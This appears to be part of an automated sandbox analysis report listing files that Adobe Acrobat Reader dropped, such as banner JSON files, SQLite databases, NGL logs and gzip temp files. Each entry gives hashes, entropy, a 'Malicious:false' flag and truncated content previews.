                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.330538947948233
                    Encrypted:false
                    SSDEEP:
                    MD5:88583798501983AC8554BCDA3D3885B1
                    SHA1:025735B98F0AA855660E42FC7EE9A4AD18CD6E69
                    SHA-256:6AC2D00434C0BBA8876FF0D4AA83AB833A9CA07FA377AE24D39ACF221D064FD9
                    SHA-512:13E85237FA7FE2447071FFBA41A467201605197DF89D4759C6B95C9D3E63BB613FC5223E512F57302D42D10E4D30D7DC694478C7F363AB39C2AA10714BB61D06
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.311692181957002
                    Encrypted:false
                    SSDEEP:
                    MD5:282873D4768D309334C0403D201F48EB
                    SHA1:665C6BEC904E46624898466550829BFE92E66D97
                    SHA-256:0423BAC8E98D716A9612F5B7638200AA1EAE5B4F3018E098A1F66074B1D9C6A1
                    SHA-512:53A7FD0FDEBB0FFD86D6F918C00051BBB7CF003ED03EAF06FD51F86DF30FF1BEE5B661B0D418766D29B858325B7D6086BC5DA3CC266A7FC8B5C300EC601B54C3
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):284
                    Entropy (8bit):5.297948403053765
                    Encrypted:false
                    SSDEEP:
                    MD5:2B70F642802E99255EF121A380E77019
                    SHA1:256439697755F983E65D8BBD6FD8CB2BC12943F7
                    SHA-256:B943DD284659A33E14264C2588CFD5786E9FD7D5C88B23F36E3674E0AE6BF417
                    SHA-512:813E1B70C13AB1DA32372D9306560DD91D3AE90CFED00A1F2D62D7BE3F77DC18135CDF1CB8220B744FB569AF9F09375ACDD542B48CD612C91DD71FCE3A91D0A4
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):291
                    Entropy (8bit):5.295158920991986
                    Encrypted:false
                    SSDEEP:
                    MD5:1605B791864AF20DEEC3A2F4813A44F2
                    SHA1:19B6E86684F70FCE20395A66942CAE46FBE5D885
                    SHA-256:BA6D5C4FDFD82823C6405C2D88967C78A0C59F911DBF6CA28D1317688A3B39EA
                    SHA-512:56D9C84A791C5AE628AD01411DDD1C6E3D76B2BBEA540ABBE875DA030861690608587D3D210F61696B9CA0ADE477ADC3B6B4F685DC745C9A228F0127E8073F46
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.298997944151284
                    Encrypted:false
                    SSDEEP:
                    MD5:D06C7435490BA89DEDB71BAE3E0FD9D1
                    SHA1:1A1BC333C7C17EE8888FAAA764C4309394A5D27D
                    SHA-256:5BF4D7687F8460FA937B302EB3B8EE1DFD9239240F544E365F12ACC82E168888
                    SHA-512:22734037EE8182366259DD7B5782A0E34A0CCDA074BA9F0F05E6485218CE14DB93AED23A4EF6511CBD69C8B03372A175DA91C55295D8C11D22959357CDC47DB0
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2012
                    Entropy (8bit):5.8393243044647365
                    Encrypted:false
                    SSDEEP:
                    MD5:1226A1F7593772B466C468CBCDACB6DA
                    SHA1:8483F5B443085EA9CE458589F5BA6D7130D28FE4
                    SHA-256:0FCFD50BA46998A0F31ACCE0838B696B12879CEEE908ED58810C6A2E737B5E82
                    SHA-512:38481073414C6E0F0CC2064B0998843AEA5C2FF28FF41F1F4A2374C33A926A7952CD0D4DFB633790D05B08CE27295F6AF75AFE3E10A746D8C7096E5DA6D193AD
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):5.275098963566754
                    Encrypted:false
                    SSDEEP:
                    MD5:6DEB7FF3D875A9DA18977F0DB892671B
                    SHA1:9CA830C22B0E564534EEF865D632694937B64FC6
                    SHA-256:2D27600D46B5F942915AF4E69F42DED7D914B5DA7D1DD32BCC8594777F49A7D3
                    SHA-512:C2A3B539A2A3640D1C3BFB4E72C54C64448F50FB781C72925B9000875570221BF737736E0760A43A45AED59CAB81EB8236D8A688726F10478A68D3EAC69FCF5D
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):282
                    Entropy (8bit):5.288337227019866
                    Encrypted:false
                    SSDEEP:
                    MD5:499A7332FE225AFE510665C886DB8AAA
                    SHA1:8098C58E7B9DCB2B3094EBFE140667E791E17D58
                    SHA-256:8D81A3D97B1B2479B385418E7B426F34BBDA6F727CB1BDE192C7AA647D1D89DC
                    SHA-512:F3E21DF53A90BB04D1AECD218CB8E0E8AF9AEA121C1CA1EE9B04CD2C244C50C7958C61709531A0BC54138462087873CE75E8E8EAD166B13030A329C09D664498
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4
                    Entropy (8bit):0.8112781244591328
                    Encrypted:false
                    SSDEEP:
                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                    Malicious:false
                    Reputation:unknown
                    Preview:....

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2815
                    Entropy (8bit):5.121887135472307
                    Encrypted:false
                    SSDEEP:
                    MD5:E9785D0774BF21EF632F817D6B97EACC
                    SHA1:D4929DB238FD3AD28A20F0ACF1BD2B18D68C5A98
                    SHA-256:7695E554000108DFB365FAFC541F272A2BED21BC60C1BFDEBEA1881196BDC2C4
                    SHA-512:D203EBC1CBB34D4EB98A0BC6490DC451478FA256F839781FBF79F5A3A19EF778638516EBE4FC79EE8DA8FBF46402F4BE52C75059AF1EE3CD2B39A44ECCCE5927
                    Malicious:false
                    Reputation:unknown
                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"644871db1f95722e30b605712f6d9f24","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742260670000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"8990506d7b2a36955b8b2b7ba5e60f0f","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2012,"ts":1742260670000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"00595b4155e3623ce16906b8ae2fbb4b","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2064,"ts":1742260670000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"89c8cbb215558fe24d213a5755f6dbf5","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2113,"ts":1742260670000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8dde71ac5d6472abeea59f543a13593b","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742260670000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"76f04fad280781c75ff8629e954ea42e","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                    Category:dropped
                    Size (bytes):12288
                    Entropy (8bit):0.9888236792776179
                    Encrypted:false
                    SSDEEP:
                    MD5:B1BDFB2F9F39067EB67B54EA88E56CC0
                    SHA1:C4AAE87B5BDB4D9873991395042C1EEDBB54ACF4
                    SHA-256:F46C67E572E46438DAF9BAA96043CD6EF4D0C5F2ADA76A781580A9E4BA9A8C25
                    SHA-512:4F3F8BDCA879C50BD134E643C08D222DB1D0D292D73B4BA3715891AC25B92E79D2BC4250DF4DFAA08A62B8F55693F092B25288496D2618DECD0BD5BABDD70920
                    Malicious:false
                    Reputation:unknown
                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):8720
                    Entropy (8bit):1.3453898853724056
                    Encrypted:false
                    SSDEEP:
                    MD5:FCF973D7E11919E069D34A68089C9F01
                    SHA1:C61D7763AFAF2BD7A2A299105ACFD71D30239A51
                    SHA-256:0AA9DBC466F1817CD8DF9C1F1D3F560FB675D09588FF1C34B10ABD4A413DCE82
                    SHA-512:660932DFB605941ECD6557677E8499B882CE1EC7E83AD1192475299D02DDAA0DB644038DF22417C9401FD4B567EA553128EECED1D883C08170C0D7621FC71E43
                    Malicious:false
                    Reputation:unknown
                    Preview:.... .c......u........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-17 21-17-47-465.log

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393)
                    Category:dropped
                    Size (bytes):16525
                    Entropy (8bit):5.353642815103214
                    Encrypted:false
                    SSDEEP:
                    MD5:91F06491552FC977E9E8AF47786EE7C1
                    SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                    SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                    SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                    Malicious:false
                    Reputation:unknown
                    Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                    Category:dropped
                    Size (bytes):15114
                    Entropy (8bit):5.381856923058665
                    Encrypted:false
                    SSDEEP:
                    MD5:BACB4E30B74A42FC33ADD80DF33E87D1
                    SHA1:ACDC76D19CF811127875D384BCCC15D0DFF5C11A
                    SHA-256:8D0AF1305FDC626F3068BD442D084646296C0E48A96D83D4739F6A007CFC32DD
                    SHA-512:7A97554B11E436CFA3B36B50FF2CB28E071977836BEDD766E9BA178D426451DDF373DDC8BF5523A7877AA1EE5D2A87C6DAB0193BE3399EA009E29DDA9F773F1C
                    Malicious:false
                    Reputation:unknown
                    Preview:SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:482-0400 ThreadID=6432 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=6ad96853-72e6-4955-b893-5750c9995ffc.1742260667482 Timestamp=2025-03-17T21:17:47:484-0400 ThreadID=6432 Component=ngl-lib_NglAppLib Description="SetConf

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):29752
                    Entropy (8bit):5.427681350276674
                    Encrypted:false
                    SSDEEP:
                    MD5:8E0F3037507CADDF24CF52FE250984E4
                    SHA1:8C7EC300E4CD4D3ACD0BFBB603BB7A64FB8A6AAA
                    SHA-256:978EB853EFEEDC89F2757842CB357694D4CFD419FB0B0D2DF082E0F4B990A934
                    SHA-512:CEE4CE006DF020257CE2CF745ADDFF8ADBD25FC0D192BAC6EEEECA701B960D5D01DE7E056F6665FC60AE30E6E57391F43D6712075854D1821361AF77232272BB
                    Malicious:false
                    Reputation:unknown
                    Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-

                    C:\Users\user\AppData\Local\Temp\acrocef_low\29086d70-6c62-4492-a5e4-7ac8afbc783a.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                    Category:dropped
                    Size (bytes):1407294
                    Entropy (8bit):7.97605879016224
                    Encrypted:false
                    SSDEEP:
                    MD5:1D64D25345DD73F100517644279994E6
                    SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                    SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                    SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                    Malicious:false
                    Reputation:unknown
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                    C:\Users\user\AppData\Local\Temp\acrocef_low\3ed50fb7-becc-4b71-9378-8299e9fcbda8.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                    Category:dropped
                    Size (bytes):1419751
                    Entropy (8bit):7.976496077007677
                    Encrypted:false
                    SSDEEP:
                    MD5:9E1C73A645A9305F006E8DEACABC2978
                    SHA1:1871A2DED53AD50892F721C92197F18F1EAC7A4D
                    SHA-256:40D3FED1293133C81742989E75B7C37363068D96DFABF6E4890A452D97A13931
                    SHA-512:C27289F49A7E2ECC45C98E34FAB296D5BA34028ABB8C011DC07126D6F4C0E1729D875F0775B93391F63A6CC8A84BA098D001EBB593021CC404C66A8F0D7683CA
                    Malicious:false
                    Reputation:unknown
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                    C:\Users\user\AppData\Local\Temp\acrocef_low\7745a554-986b-4486-9a64-855e5b670b9a.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                    Category:dropped
                    Size (bytes):758601
                    Entropy (8bit):7.98639316555857
                    Encrypted:false
                    SSDEEP:
                    MD5:3A49135134665364308390AC398006F1
                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                    Malicious:false
                    Reputation:unknown
                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                    C:\Users\user\AppData\Local\Temp\acrocef_low\7e96f4f3-8c6d-48d4-aab1-cca13d62e1fb.tmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                    Category:dropped
                    Size (bytes):386528
                    Entropy (8bit):7.9736851559892425
                    Encrypted:false
                    SSDEEP:
                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
